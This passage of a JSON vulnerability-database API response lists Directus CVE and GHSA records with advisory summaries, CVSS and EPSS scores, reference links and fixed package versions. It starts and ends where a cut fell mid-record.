This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04832","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04829","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442"},{"reference_url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/"}],"url":"https://github.com/directus/directu
s/security/advisories/GHSA-38hg-ww64-rrwc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35442","GHSA-38hg-ww64-rrwc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ga3s-595f-2keq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/124112?format=json","vulnerability_id":"VCID-gf4m-ad8j-7bbn","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.2.0, when sharing an item, a typical user can specify an arbitrary role. It allows the user to use a higher-privileged role to see fields that otherwise the user should not be able to see. Instances that are impacted are those that use the share feature and have specific roles hierarchy and fields that are not visible for certain roles. 
Version 11.2.0 contains a patch for the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57651","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00347","scoring_system":"epss","scoring_elements":"0.57767","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24353"},{"reference_url":"https://github.com/directus/directus/pull/23716","reference_id":"23716","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/pull/23716"},{"reference_url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804","reference_id":"e288a43a79613dada905da683f4919c6965ac804","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring
_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804"},{"reference_url":"https://github.com/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg","reference_id":"GHSA-pmf4-v838-29hg","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.2.0","reference_id":"v11.2.0","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.2.0"},{"reference_url":"https://www.youtube.com/watch?v=DbV4IxbWz
N4","reference_id":"watch?v=DbV4IxbWzN4","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/"}],"url":"https://www.youtube.com/watch?v=DbV4IxbWzN4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/376928?format=json","purl":"pkg:npm/directus@11.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.
0"}],"aliases":["CVE-2025-24353","GHSA-pmf4-v838-29hg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gf4m-ad8j-7bbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360871?format=json","vulnerability_id":"VCID-jvtg-cnnb-7ubg","summary":"Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058"},{"reference_url":"https://github.com/directus/directus/pull/19332","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dir
ectus/directus/pull/19332"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8","reference_id":"GHSA-22rr-f3p8-5gf8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-22rr-f3p8-5gf8"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32458?format=json","purl":"pkg:npm/directus@10.6.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerabilit
y":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-nupg-ae85-dqaw"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0"}],"aliases":["GHSA-22rr-f3p8-5gf8","GMS-2023-2358"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jvtg-cnnb-7ubg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39732?format=json","vulnerability_id":"VCID-jy2x-jbbb-zua5","summary":"Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. 
There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25775","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25577","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238","reference_id":"CVE-2024-28238","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238"},{"reference_url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/"}],"url":"https://githu
b.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29718?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pt9-wpk9-tfhj"},{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28238","GHSA-2ccr-g2rv-h677"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.v
ulnerablecode.io/vulnerabilities/VCID-jy2x-jbbb-zua5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50303?format=json","vulnerability_id":"VCID-pvfa-xp3e-8kg2","summary":"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18519","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18356","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-6534"},{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"capaldi","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elemen
ts":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://directus.io/","reference_id":"directus.io","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/"}],"url":"https://directus.io/"},{"reference_url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fff-gqw3-vj86"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86","reference_id":"GHSA-3fff-gqw3-vj86","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33133?format=json","purl":"pkg:npm/directus@10.13.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vuln
erability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2"}],"aliases":["CVE-2024-6534","GHSA-3fff-gqw3-vj86"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pvfa-xp3e-8kg2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41764?format=json","vulnerability_id":"VCID-qeh1-cm33-93g1","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.2, providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. 
This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID. This vulnerability is fixed in 10.11.2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128","reference_id":"","reference_type":"","scores":[{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.58141","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.58028","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b","reference_id":"7d2a1392f43613094de700062aba168a9400dd3b","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128","reference_id":"CVE-2024-36128","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128"},{"reference_url":"https://github.com/advisories/GHSA-632p-p495-25m5","refere
